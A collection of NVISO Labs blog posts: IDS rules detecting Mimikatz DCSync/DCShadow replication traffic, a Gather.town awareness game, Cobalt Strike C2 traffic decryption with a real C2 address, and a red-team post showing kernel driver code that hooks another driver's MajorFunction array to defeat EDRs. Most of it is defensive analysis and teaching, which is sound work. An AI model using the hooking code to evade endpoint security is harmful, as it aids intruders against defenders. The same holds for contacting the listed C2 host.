It is also possible to change the flowbit-setting rule (the rule for packet A) to generate alerts. This is done by removing the following clause:

flowbits:noalert;

Alerts are generated whenever the DRSUAPI interface is bound to, regardless of which function is called.

And a generic rule for a DRSUAPI function call can also be created, by removing the following clause from the DsGetNCChanges rule (for example):

content:"|03 00|"; offset:22; depth:2;

Byte order and DCERPC

DCERPC is a flexible protocol that allows different byte orders. A byte order is the order in which bytes are transmitted over the network. When dealing with integers that are encoded using more than one byte, for example, different orders are possible.

The opnum detected in the dcsync rule is 3. This integer is encoded with 2 bytes: a most significant byte (00) and a least significant byte (03).

When the byte order is little-endian, the least significant byte (03) is transmitted first, followed by the most significant byte (00). This is what is present in the captured network traffic.

But when the byte order is big-endian, the most significant byte (00) is transmitted first, followed by the least significant byte (03).

And thus, the rules would not trigger for big-endian byte-order.
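
The difference is easy to illustrate with Python’s struct module:

import struct

opnum = 3  # DsGetNCChanges
print(struct.pack('<H', opnum).hex())  # little-endian: 0300
print(struct.pack('>H', opnum).hex())  # big-endian: 0003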

The byte order is specified by the client in the data representation bytes of the DCERPC packet data:

Figure 13: DCERPC data representation

If the first nibble of the first byte of the data representation is one, the byte order is little-endian.

Big-endian is encoded with nibble value zero.

We have developed rules that check the byte-order, and match the opnum value accordingly:

alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x10,4; byte_test:1,<=,0x11,4; content:"|03 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000012; rev:1;)
alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x00,4; byte_test:1,<=,0x01,4; content:"|00 03|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000013; rev:1;)

alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x10,4; byte_test:1,<=,0x11,4; content:"|05 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000015; rev:1;)
alert tcp $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,>=,0x00,4; byte_test:1,<=,0x01,4; content:"|00 05|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000016; rev:1;)

Notice that Suricata and Snort can also be configured to enable the dcerpc preprocessor. This allows for the creation of rules that don’t have to take implementation details into account, like byte-order:

alert dcerpc $WORKSTATIONS any -> $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; dce_iface:e3514235-4b06-11d1-ab04-00c04fc2dcd2; dce_opnum:3; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000017; rev:1;)

But such rules can have a significantly higher performance impact, because of the extra processing performed by the dcerpc preprocessor.

Conclusion

In this blog post we show how to detect Active Directory replication network traffic. Such traffic is normal between domain controllers, but it should not be seen between a non-domain controller (like a workstation or a member server) and a domain controller. The presence of unexpected DRS traffic is a strong indication of an ongoing Active Directory attack, like Mimikatz’ DCSync or DCShadow.

The rules we start with operate at a low network layer level (TCP data), but we show how to develop rules at a higher level, that are more versatile and require less attention to implementation details.

Finally, the rules presented in this blog post are alerting rules for a detection system. But they can easily be modified into blocking rules for a prevention system, by replacing the alert action with a drop or reject action.

All the rules presented here can also be found on our IDS rules Github repository.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Another spin to Gamification: how we used Gather.town to build a (great!) Cyber Security Game

By: smadessis
CSI Game hosted on Gather.town platform

Let’s recap October. Cyber Security Awareness Month. For a cyber awareness enthusiast, it is hard to conceal the excitement that comes with a full month of initiatives in all shapes and sizes, built around a genuine and strong effort to help keep companies and their people “safe online”. At NVISO too, the buzz is tangible, and everyone is eager to know what great projects we will be launching for this year’s Cyber Security Awareness Month. We’re lucky enough to have a client who was willing to go the extra mile and allowed us to let our imagination run wild. And that is exactly what we did.

Let’s make it: “a game”

Our assignment was simple, yet challenging:

  • Define a scenario that fits a “Security at Home” context, where we connect our security tips to a “working from home” context
  • Make something fun out of the everyday security challenges we face in our day-to-day life at home. Basically, challenges that should be familiar to any player: the main goal was not to teach something new, but to reinforce existing awareness.
  • Set up a digital experience that allowed people working remotely to collaborate smoothly in a team, and to compete against each other in teams.

Gamification being all the rage, there are quite a few options out there, some of which we’ve tested and used for projects in the past. Think online cyber escape games (even a full-size escape truck), scavenger hunts, online quizzes, e-learnings, … You name it. However, none of these fully fit the brief.

A match made in…

Gather.town logo

Inspired by the CSCBE 2021 event, successfully hosted remotely through the use of Gather.town, we came up with the idea of creating our own game and dedicated space. An all-in-one solution which is fully customizable and which allows for direct audio and video communication between hosts, players and teams. A match made in cyber awareness heaven? Or too good to be true? Let’s dive into the details.

Concept

As a concept we opted for the well-known schemes of a classic Crime Scene Investigation (CSI) game, which has proven to be a successful basis for many legendary series and video games. We came up with a cyber-related crime that could fit into the personal and social environment of your average neighbour and created a whole world around it. By world we mean: a location, a family (and pet), a social life, pieces of evidence and of course many irrelevant objects to create some noise ;-). All elements of this fictional world are linked to clearly defined (not so fictional) cyber security topics and lessons.

“The Harris’s family apartment gets robbed in the middle of the night without them noticing. 

This is strange, since their newly installed connected alarm system was active and signalled “all clear” when they woke up that morning. The whole family is a bit shaken, and no-one can really explain what happened…​

Turns out their alarm system has been compromised and was turned off to ensure the burglar had easy access.”

Teams signing up for the game will be asked to investigate the crime, in order to answer the main question: “how did it happen?”. Additional questions are asked in the ‘investigation report’ to distinguish between top teams and to make the game a real competition with final scores and a leaderboard.

Connecting the dots: tips to create an attractive and usable Gather.town virtual world

To allow this concept to work in practice, we needed a strong and stable platform that would deliver on both connectivity and experience. That’s where Gather.town comes into play.

Disclaimer: we don’t have any particular business relationship with Gather.town. It’s just that we’ve tested a few platforms, and really liked that particular one.

Designing an attractive map

CSI Game map edition in Tiled

Gather.town consists of a map filled with interactive objects; your avatar can move around the map and interact with those objects.

First, we needed to create a map that would fulfil our scenario requirements while also being intuitive to navigate for non-gamers. Instead of designing everything from scratch, we used tile sets from the well-known RPG Maker series and adapted them so they could be easily manipulated in Tiled, an open-source map editing application. Using this software, we were able to divide the map into two layers, the foreground and the background. This allowed for a more realistic way of moving in the room by giving the players a perception of depth.

We decided to go for a square and compact room so that people would not get lost easily, and so that everyone could hear each other even from the other side of the map. However, the sky is basically the limit here: endless options to go crazy. It is important to note that these kinds of configuration details really do affect the overall user experience and should therefore not be left to chance.

Have the players check out the content of a computer, in the map

As the Gather.town platform is still under development, the number of available features was limited compared to our ambitious game scenario. To increase the range of possible types of interactive objects, we decided to embed a home-made web application shown as an iframe in the game. This could then be presented as the content of a computer – for example, the social media profile of a family member, their e-mail inbox, or some Twitter post.

To touch upon the topic of phishing, we created an e-mail inbox (cf. the screenshot below) with four emails that may or may not be phishing. We decided to go with all legitimate emails, and for each of them an additional piece of evidence was added somewhere in the room. Participants still needed to look for red flags in the emails, but would find justifications for each email during their investigation.

Mailbox of mother Suzy

Another example is a social media account (and privacy settings page) we created for one of the family members to introduce the topic of social engineering. Participants would need to make some links between this profile and testimonials to understand how the burglar used that technique to commit their crime.

To balance the costs and efforts, we decided to go for a frontend-only application hosted on an AWS S3 bucket. The application was made using Vue.JS along with Buefy, so that we would not have to worry about the design either.

Each interactive item corresponds to a different path in the URL. Having a frontend-only application did not prevent us from building interactive items. Indeed, we implemented a fake login screen which would validate the credentials directly in the frontend. As the players have a limited time to complete the investigation, it is unlikely they will search for the solution in the source code, so we considered we could afford the risk of cheating. In general, however, let’s not consider this a good practice for validating passwords! 😉

Collecting & processing responses

In order to capture answers to be provided through the investigation report, we used Microsoft Forms (we could not use our web application as it’s a frontend-only one). The great thing about using Microsoft 365 tools is that it allowed us to process the input through a Microsoft Power Automate flow. That way we could already pre-calculate some of the scoring and redirect the output in order to make it easier for the host to preview.

Additionally, we aimed to provide a real-time leaderboard and give the results to the players right after they finish the game, for the ultimate game/competition experience. It was a challenge to instantly compute the overall score for 11 questions, all having different weights, some even having a negative score. To ease our task, we went for Microsoft SharePoint Lists. They are similar to Excel sheets, but more user friendly, as the formatting can be customized and the output is really visual.

Having implemented the above, our game was ready to be played!

Challenges?

As for any online security awareness campaign, there are inherent challenges that we tried to overcome by being as prepared as possible. On our side as well as on the client’s side.

Reaching a broad audience

Let’s get things straight. Gamification is hot. However, don’t expect people to sign up just because it’s a game you’re offering. Add some “online fatigue” to the mix and you have a real challenge at hand.

Therefore, it is best not to leave things to chance. From what we have experienced, the following points are important:

  • Investing time in a proper communication plan and clearly explaining the goal of the exercise (by the way, planning for Cyber Month 2022 starts now!). Also showing the platform helps: a cool set-up, e.g. with a small video walkthrough, will attract attention! Word of mouth advertising can spark the interest of a colleague. Capturing testimonials from happy early joiners and sharing them with everyone can help too.
  • Adding a bit of competition by using leader boards can also motivate people into playing your game. A small prize and big recognition for the winners always make for effective communication material.

Testing, testing, testing

From the scenario itself to the most technical parts, such as the accessibility of the material or the software used for communicating, testing is crucial. Each issue you encounter early on is an issue that won’t happen during actual game sessions.

How we performed the testing phase:

  • We went for three distinct dry runs, with people from different backgrounds and skills, different teams, and with different computers 😊. Not everyone is used to collaboration tools and games, and dry runs enabled us to identify confusing items and rework them.

We had multiple people in our team running the game, sometimes at the same moment, so we needed them to operate with a certain degree of autonomy and know how to handle every potential error. We thus thought about the most plausible failure scenarios and prepared a plan B for each of these cases. Documenting those fallback procedures is essential to ensure issues can be tackled rapidly when in the midst of the action.

Conclusion

At the end of the day, the CSI concept and the use of Gather.town as a dedicated space really lived up to our expectations. Participants had fun creating avatars and indicated they had a great time while reinforcing knowledge on cyber security awareness topics they might have come across in the past. If this is setting the bar for next year, we cannot wait to see what Cyber Security Awareness Month has in store for us!

About the authors

Sophie Madessis is a member of the NVISO Labs team involved in various R&D tasks to support other teams regarding cyber security related projects. Along with performing some security assessments, she likes spending time on automating processes using Power Automate and other Microsoft tools. You can find Sophie on Linkedin.

Hannelore Goffin is a senior consultant within the Cyber Strategy team at NVISO where she is passionate about raising awareness on all cyber related topics, both for the professional and personal context. Next to awareness, Hannelore focuses on third party risk management. You can find Hannelore on Linkedin.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Cobalt Strike: Using Process Memory To Decrypt Traffic – Part 3

By: Didier Stevens

We decrypt Cobalt Strike traffic with cryptographic keys extracted from process memory.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. And in part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In this blog post, we will explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump.

Cobalt Strike network traffic can be decrypted with the proper AES and HMAC keys. In part 2, we obtained these keys by decrypting the metadata with the private RSA key. Another way to obtain the AES and HMAC key, is to extract them from the process memory of an active beacon.

One method to produce a process memory dump of a running beacon is to use Sysinternals’ tool procdump. A full process memory dump is not required; a dump of all writable process memory is sufficient.
Example of a command to produce a process dump of writable process memory: “procdump.exe -mp 1234”, where -mp is the option to dump writable process memory and 1234 is the process ID of the running beacon. The process dump is stored inside a file with extension .dmp.

For Cobalt Strike version 3 beacons, the unencrypted metadata can often be found in memory by searching for byte sequence 0x0000BEEF. This sequence is the header of the unencrypted metadata. The earlier in the lifespan of a process the process dump is taken, the more likely it is to contain the unencrypted metadata.

Figure 1: binary editor view of metadata in process memory
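
Searching for this header yourself takes just a few lines of Python (a sketch; the dump file name is hypothetical):

with open('beacon.dmp', 'rb') as f:
    dump = f.read()

# 0x0000BEEF: the header of the unencrypted metadata
offset = dump.find(b'\x00\x00\xbe\xef')
while offset != -1:
    print('candidate metadata at offset 0x%x' % offset)
    offset = dump.find(b'\x00\x00\xbe\xef', offset + 4)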

Tool cs-extract-key.py can be used to find and decode this metadata, like this:

Figure 2: extracted and decoded metadata

The metadata contains the raw key: 16 random bytes. The AES and HMAC keys are derived from this raw key by calculating the SHA256 value of the raw key. The first half of the SHA256 value is the HMAC key, and the second half is the AES key.
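
This derivation is simple to reproduce in Python (a sketch; the raw key shown is a made-up example):

import hashlib

raw_key = bytes.fromhex('00112233445566778899aabbccddeeff')  # hypothetical raw key

digest = hashlib.sha256(raw_key).digest()
hmac_key = digest[:16]  # first half of the SHA256 value
aes_key = digest[16:]   # second half of the SHA256 value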

These keys can then be used to decrypt the captured network traffic with tool cs-parse-http-traffic.py, like explained in Part 2.

Remark that tool cs-extract-key.py is likely to produce false positives: byte sequences that start with 0x0000BEEF but are not actual metadata. This is the case for the example in figure 2: the first instance is indeed valid metadata, as it contains a recognizable machine name and username (look at the Field: entries), and the AES and HMAC keys extracted from that metadata have also been found at other positions in process memory. But that is not the case for the second instance (no recognizable names, no AES and HMAC keys found at other locations), and thus it is a false positive that must be ignored.

For Cobalt Strike version 4 beacons, it is very rare that the unencrypted metadata can be recovered from process memory. For these beacons, another method can be followed. The AES and HMAC keys can be found in writable process memory, but there is no header that clearly identifies these keys. They are just 16-byte long sequences, without any distinguishable features. To extract these keys, the method consists of performing a kind of dictionary attack. All possible 16-byte long, non-null sequences found in process memory, will be used to try to decrypt a piece of encrypted C2 communication. If the decryption succeeds, a valid key has been found.
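
Conceptually, this dictionary attack looks like the following Python sketch. It assumes a layout where the last 16 bytes of the encrypted task data are an HMAC-SHA256 tag (truncated to 16 bytes) computed over the preceding ciphertext; the actual implementation of cs-extract-key.py may differ in its details:

import hashlib
import hmac

def find_hmac_key(dump, encrypted):
    # split the encrypted task data into ciphertext and HMAC tag
    ciphertext, tag = encrypted[:-16], encrypted[-16:]
    # try every non-null 16-byte sequence in the dump as HMAC key
    for i in range(len(dump) - 15):
        candidate = dump[i:i + 16]
        if candidate == b'\x00' * 16:
            continue
        if hmac.new(candidate, ciphertext, hashlib.sha256).digest()[:16] == tag:
            return candidate  # verification succeeded: valid key found
    return None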

This method does require a process memory dump and encrypted data.
This encrypted data can be extracted using tool cs-parse-http-traffic.py like this: cs-parse-http-traffic.py -k unknown capture.pcapng

With an unknown key (-k unknown), the tool will extract the encrypted data from the capture file, like this:

Figure 3: extracting encrypted data from a capture file

Packet 103 is an HTTP response to a GET request (packet 97). The encrypted data of this response is 64 bytes long: d12c14aa698a6b85a8ed3c3c33774fe79acadd0e95fa88f45b66d8751682db734472b2c9c874ccc70afa426fb2f510654df7042aa7d2384229518f26d1e044bd

This is encrypted data sent by the team server to the beacon: it contains tasks to be executed by the beacon. (Remark that in these examples, we look at encrypted traffic that has not been transformed; we will cover traffic transformed by malleable instructions in an upcoming blog post.)

We can attempt to decrypt this data by providing tool cs-extract-key.py with the encrypted task (option -t) and the process memory dump: cs-extract-key.py -t d12c14aa698a6b85a8ed3c3c33774fe79acadd0e95fa88f45b66d8751682db734472b2c9c874ccc70afa426fb2f510654df7042aa7d2384229518f26d1e044bd rundll32.exe_211028_205047.dmp.

Figure 4: extracting AES and HMAC keys from process memory

The recovered AES and HMAC key can then be used to decrypt the traffic (-k HMACkey:AESkey):

Figure 5: decrypting traffic with HMAC and AES key provided via option -k

The decrypted tasks seen in figure 5 are “data jitter”. Data jitter is a Cobalt Strike option that sends random data to the beacon (random data that is ignored by the beacon). With the default Cobalt Strike beacon profile, no random data is sent, and data is not transformed using malleable instructions. This means that with such a beacon profile, no data is sent to the beacon as long as there are no tasks to be performed by the beacon: the Content-Length of the HTTP reply is 0.

Since the absence of tasks results in no encrypted data being transmitted, it is quite easy to determine if a beacon received tasks or not, even when the traffic is encrypted: an absence of (encrypted) data means that no tasks were sent. To obfuscate this absence of commands (tasks), Cobalt Strike can be configured to exchange random data, making each packet unique. But in this particular case, that random data is useful to blue teamers: it permits us to recover the cryptographic keys from process memory. If no random data were sent, nor actual tasks, we would never see encrypted data, and thus we would not be able to identify the cryptographic keys inside process memory.

Data sent by the beacon to the team server contains the results of the tasks executed by the beacon. This data is sent with a POST request (the default), and is known as a callback. This data too can be used to find decryption keys. In that case, the process is the same as shown above, but the option to use is -c (callback) instead of -t (tasks). The reason the options are different is that the way data is encrypted by the team server differs slightly from the way data is encrypted by the beacon, and the tool must be told which of the two was used.

Some considerations regarding process memory dumps

For a process memory dump of maximum 10MB, the “dictionary” attack will take a couple of minutes.

Full process dumps can be used too, but the dictionary attack can take much longer because of the larger size of the dump. Tool cs-extract-key.py reads the process memory dump as a flat file, and thus a larger file means more processing to be done.

However, we are working on a tool that can parse the data structure of a dump file and extract / decode memory sections that are most likely to contain keys, thus speeding up the key recovery process.

Remark that beacons can be configured to encode their writable memory while they are not active (sleeping): in such cases, the AES and HMAC keys are encoded too, and cannot be recovered using the methods described here. The dump parsing tool we are working on will handle this situation too.

Finally, if the method explained here for version 3 beacons does not work with your particular memory dump, try the method for version 4 beacons. This method works also for version 3 beacons.

Conclusion

Cryptographic keys are required to decrypt Cobalt Strike traffic. The best situation is to have the corresponding private RSA key. If that is not the case, HMAC and AES keys can be recovered using a process memory dump and capture file with encrypted traffic.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Kernel Karnage – Part 2 (Back to Basics)

By: bautersj

This week I try to figure out “what makes a driver a driver?” and experiment with writing my own kernel hooks.

1. Windows Kernel Programming 101

In the first part of this internship blog series, we took a look at how EDRs interact with User and Kernel space, and explored a frequently used feature called Kernel Callbacks by leveraging the Windows Kernel Ps Callback Experiments project by @fdiskyou to patch them in memory. Kernel callbacks are only the first step in a line of defense that modern EDR and AV solutions leverage when deploying kernel drivers to identify malicious activity. To better understand what we’re up against, we need to take a step back and familiarize ourselves with the concept of a driver itself.

To do just that, I spent the vast majority of my time this week reading the fantastic book Windows Kernel Programming by Pavel Yosifovich, which is a great introduction to the Windows kernel and its components and mechanisms, as well as drivers and their anatomy and functions.

In this blogpost I would like to take a closer look at the anatomy of a driver and experiment with a different technique called IRP MajorFunction hooking.

2. Anatomy of a driver

Most of us are familiar with the classic C/C++ projects and their characteristics; for example, the int main(int argc, char* argv[]){ return 0; } function, which is the typical entry point of a C++ console application. So, what makes a driver a driver?

Just like a C++ console application, a driver requires an entry point as well. This entry point comes in the form of a DriverEntry() function with the prototype:

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);

The DriverEntry() function is responsible for 2 major tasks:

  1. setting up the driver’s DeviceObject and associated symbolic link
  2. setting up the dispatch routines

Every driver needs an “endpoint” that other applications can use to communicate with it. This comes in the form of a DeviceObject, an instance of the DEVICE_OBJECT structure. The DeviceObject is abstracted in the form of a symbolic link and registered in the Object Manager’s GLOBAL?? directory (use Sysinternals’ WinObj tool to view the Object Manager). User mode applications can use functions like NtCreateFile with the symbolic link as a handle to talk to the driver.

WinObj

Example of a C++ application using CreateFile to talk to a driver registered as “Interceptor” (hint: it’s my driver 😉 ):

HANDLE hDevice = CreateFile(L"\\\\.\\Interceptor", GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);

Once the driver’s endpoint is configured, the DriverEntry() function needs to sort out what to do with incoming communications from user mode and other operations such as unloading itself. To do this, it uses the DriverObject to register Dispatch Routines, or functions associated with a particular driver operation.

The DriverObject contains an array, holding function pointers, called the MajorFunction array. This array determines which particular operations are supported by the driver, such as Create, Read, Write, etc. The index of the MajorFunction array is controlled by Major Function codes, defined by their IRP_MJ_ prefix.

There are 3 main Major Function codes, alongside the DriverUnload operation, which need initializing for the driver to function properly:

// prototypes
void InterceptUnload(PDRIVER_OBJECT);
NTSTATUS InterceptCreateClose(PDEVICE_OBJECT, PIRP);
NTSTATUS InterceptDeviceControl(PDEVICE_OBJECT, PIRP);

//DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = InterceptUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =  InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = InterceptDeviceControl;

    //...
}

The DriverObject->DriverUnload dispatch routine is responsible for cleaning up and preventing any memory leaks before the driver unloads; a leak in the kernel will persist until the machine is rebooted. The IRP_MJ_CREATE and IRP_MJ_CLOSE Major Functions handle CreateFile() and CloseHandle() calls. Without them, handles to the driver couldn’t be created or destroyed, making the driver effectively unusable. Finally, the IRP_MJ_DEVICE_CONTROL Major Function is in charge of I/O operations/communications.

A typical driver communicates by receiving requests, handling those requests or forwarding them to the appropriate device in the device stack (out of scope for this blogpost). These requests come in the form of an I/O Request Packet or IRP, which is a semi-documented structure, accompanied by one or more IO_STACK_LOCATION structures, located in memory directly following the IRP. Each IO_STACK_LOCATION is related to a device in the device stack and the driver can call the IoGetCurrentIrpStackLocation() function to retrieve the IO_STACK_LOCATION related to itself.

The previously mentioned dispatch routines determine how these IRPs are handled by the driver. We are interested in the IRP_MJ_DEVICE_CONTROL dispatch routine, which corresponds to the DeviceIoControl() call from user mode or ZwDeviceIoControlFile() call from kernel mode. An IRP request destined for IRP_MJ_DEVICE_CONTROL contains two user buffers, one for reading and one for writing, as well as a control code indicated by the IOCTL_ prefix. These control codes are defined by the driver developer and indicate the supported actions.

Control codes are built using the CTL_CODE macro, defined as:

#define CTL_CODE(DeviceType, Function, Method, Access)((DeviceType) << 16 | ((Access) << 14) | ((Function) << 2) | (Method))

Example for my Interceptor driver:

#define IOCTL_INTERCEPTOR_HOOK_DRIVER CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_DRIVER CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_LIST_DRIVERS CTL_CODE(0x8000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_ALL_DRIVERS CTL_CODE(0x8000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)
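
As a quick sanity check, the value such a control code expands to can be computed outside the driver, for example in Python (assuming the WDK values METHOD_BUFFERED = 0 and FILE_ANY_ACCESS = 0):

# CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
device_type, function, method, access = 0x8000, 0x800, 0, 0
ioctl = (device_type << 16) | (access << 14) | (function << 2) | method
print(hex(ioctl))  # 0x80002000 -> IOCTL_INTERCEPTOR_HOOK_DRIVER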

3. Kernel land hooks

Now that we have a vague idea how drivers communicate with other drivers and applications, we can think about ways to intercept those communications. One of these techniques is called IRP MajorFunction hooking.

hook MFA

Since drivers and all other kernel processes share the same memory, we can also access and overwrite that memory, as long as we don’t upset PatchGuard by modifying critical structures. I wrote a driver called Interceptor, which does exactly that. It locates the target driver’s DriverObject and retrieves its MajorFunction array (MFA). This is done using the undocumented ObReferenceObjectByName() function, which uses the driver’s name to get a pointer to the DriverObject.

UNICODE_STRING targetDriverName = RTL_CONSTANT_STRING(L"\\Driver\\Disk");
PDRIVER_OBJECT DriverObject = nullptr;

status = ObReferenceObjectByName(
	&targetDriverName,
	OBJ_CASE_INSENSITIVE,
	nullptr,
	0,
	*IoDriverObjectType,
	KernelMode,
	nullptr,
	(PVOID*)&DriverObject
);

if (!NT_SUCCESS(status)) {
	KdPrint((DRIVER_PREFIX "failed to obtain DriverObject (0x%08X)\n", status));
	return status;
}

Once it has obtained the MFA, it will iterate over all the Dispatch Routines (IRP_MJ_) and replace the pointers, which are pointing to the target driver’s functions (0x1000 – 0x1003), with my own pointers, pointing to the *InterceptHook functions (0x2000 – 0x2003), controlled by the Interceptor driver.

//the MajorFunction array has IRP_MJ_MAXIMUM_FUNCTION + 1 entries, hence <=
for (int i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++) {
    //save the original pointer in case we need to restore it later
    globals.originalDispatchFunctionArray[i] = DriverObject->MajorFunction[i];
    //replace the pointer with our own pointer
    DriverObject->MajorFunction[i] = &GenericHook;
}
//drop the reference taken by ObReferenceObjectByName
ObDereferenceObject(DriverObject);

As an example, I hooked the disk driver’s IRP_MJ_DEVICE_CONTROL dispatch routine and intercepted the calls:

Hooked IRP Disk Driver

This method can be used to intercept communications to any driver but is fairly easy to detect. A driver controlled by EDR/AV could iterate over its own MajorFunction array and check the function pointer’s address to see if it is located in its own address range. If the function pointer is located outside its own address range, that means the dispatch routine was hooked.

4. Conclusion

To defeat EDRs in kernel space, it is important to know what goes on at the core, namely the driver. In this blogpost we examined the anatomy of a driver, its functions, and their main responsibilities. We established that a driver needs to communicate with other drivers and applications in user space, which it does via dispatch routines registered in the driver’s MajorFunction array.

We then briefly looked at how we can intercept these communications by using a technique called IRP MajorFunction hooking, which patches the target driver’s dispatch routines in memory with pointers to our own functions, so we can inspect or redirect traffic.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

✇ NVISO Labs

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2

By: Didier Stevens

We decrypt Cobalt Strike traffic using one of 6 private keys we found.

In this blog post, we will analyze a Cobalt Strike infection by looking at a full packet capture that was taken during the infection. This analysis includes decryption of the C2 traffic.

If you haven’t already, we invite you to read part 1 first: Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1.

For this analysis, we are using capture file 2021-02-02-Hancitor-with-Ficker-Stealer-and-Cobalt-Strike-and-NetSupport-RAT.pcap.zip, this is one of the many malware traffic capture files that Brad Duncan shares on his web site Malware-Traffic-Analysis.net.

We start with a minimum of knowledge: the capture file contains encrypted HTTP traffic of a Cobalt Strike beacon communicating with its team server.

If you want to know more about Cobalt Strike and its components, we highly recommend the following blog post.

First step: we open the capture file with Wireshark, and look for downloads of a full beacon by stager shellcode.

Although beacons can come in many forms, we can identify 2 major categories:

  1. A small piece of shellcode (a couple of hundred bytes), aka the stager shellcode, that downloads the full beacon
  2. The full beacon: a PE file that can be reflectively loaded

In this first step, we search for signs of stager shellcode in the capture file: we do this with the following display filter: http.request.uri matches "/....$".

Figure 1: packet capture for Cobalt Strike traffic

We have one hit. The path used in the GET request to download the full beacon consists of 4 characters that satisfy a condition: the byte-value of the sum of the character values (aka checksum8) is a known constant. We can check this with the tool metatool.py like this:

Figure 2: using metatool.py

More info on this checksum process can be found here.
The output of the tool shows that this is a valid path to download a 32-bit full beacon (CS x86).
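
The checksum computation itself is simple to reproduce; here is a Python sketch (92 and 93 are the checksum values Cobalt Strike stagers use for x86 and x64 beacon requests):

def checksum8(path):
    # sum of the character values, truncated to a byte
    return sum(ord(c) for c in path.strip('/')) % 256

print(checksum8('/EbHm'))  # 92 -> x86 full beacon request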
The download of the full beacon is captured too:

Figure 3: full beacon download

And we can extract this download:

Figure 4: export HTTP objects
Figure 5: selecting download EbHm for saving
Figure 6: saving selected download to disk

Once the full beacon has been saved to disk as EbHm.vir, it can be analyzed with tool 1768.py. 1768.py is a tool that can decode/decrypt Cobalt Strike beacons, and extract their configuration. Cobalt Strike beacons have many configuration options: all these options are stored in an encoded and embedded table.

Here is the output of the analysis:

Figure 7: extracting beacon configuration

Let’s take a closer look at some of the options.

First of all, option 0x0000 tells us that this is an HTTP beacon: it communicates over HTTP.
It does this by connecting to 192.254.79[.]71 (option 0x0008) on port 8080 (option 0x0002).
GET requests use path /ptj (option 0x0008), and POST requests use path /submit.php (option 0x000a).
And important for our analysis: there is a known private key (Has known private key) for the public key used by this beacon (option 0x0007).

Thus, armed with this information, we know that the beacon will send GET requests to the team server, to obtain instructions. If the team server has commands to be executed by the beacon, it will reply with encrypted data to the GET request. And when the beacon has to send back output from its commands to the team server, it will use a POST request with encrypted data.

If the team server has no commands for the beacon, it will send no encrypted data. This does not necessarily mean that the reply to a GET request contains no data: it is possible for the operator, through profiles, to masquerade the communication. For example, the encrypted data could be hidden inside a GIF file. But that is not the case with this beacon. We know this because there are no so-called malleable C2 instructions in this profile: option 0x000b is equal to 0x00000004 -> this means no operations should be performed on the data prior to decryption (we will explain this in more detail in a later blog post).

Let’s create a display filter to view this C2 traffic: http and ip.addr == 192.254.79.71

Figure 8: full beacon download and HTTP requests with encrypted Cobalt Strike traffic

This displays all HTTP traffic to and from the team server. Remark that we already took a look at the first 2 packets in this view (packets 6034 and 6703): that’s the download of the beacon itself, and that communication is not encrypted. Hence, we will filter these packets out with the following display filter:

http and ip.addr == 192.254.79.71 and frame.number > 6703

This gives us a list of GET requests with their reply. Remark that there’s a GET request every minute. That too is in the beacon configuration: 60.000 ms of sleep (option 0x0003) with 0% variation (aka jitter, option 0x0005).

Figure 9: HTTP requests with encrypted Cobalt Strike traffic

We will now follow the first HTTP stream:

Figure 10: following HTTP stream
Figure 11: first HTTP stream

